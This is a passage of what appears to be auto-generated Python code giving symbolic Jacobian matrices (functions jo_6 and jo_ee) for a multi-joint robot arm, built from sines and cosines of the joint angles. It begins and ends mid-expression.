0.01*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), -(0.01*s(q[1, 0])*s(q[3, 0]) - 0.01*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]), 0, 0]])
def jo_6(q):
return np.array([[(0.01*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (-0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]), 0.01*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), (-0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [(0.01*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), (-0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + 0.01*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), (-0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [0, (0.01*s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.01*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]) + 0.01*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]), (0.01*s(q[1, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), -(0.01*s(q[1, 0])*s(q[3, 0]) - 0.01*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]), 0, 0]])
def jo_ee(q):
return np.array([[(0.3683*(((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + (0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (0.3683*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]))*s(q[5, 0]) + (-0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + (0.3683*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) - 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]), (0.3683*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + 0.3683*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0])*c(q[5, 0]) + 0.01*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), 0.3683*(-(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0])*c(q[4, 0]) + (-0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (0.3683*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[5, 0]) + (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), (-0.3683*((-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]))*s(q[5, 0]) - (0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), (0.3683*((-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]))*c(q[5, 0]) - (0.3683*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0]), 0], [(0.3683*(((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + (0.3683*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), (0.3683*(-(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]))*s(q[5, 0]) + (-0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[5, 0]) + (-0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0])*c(q[5, 0]) + 0.01*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), 0.3683*(-(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0])*c(q[4, 0]) + (-0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (0.3683*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[5, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 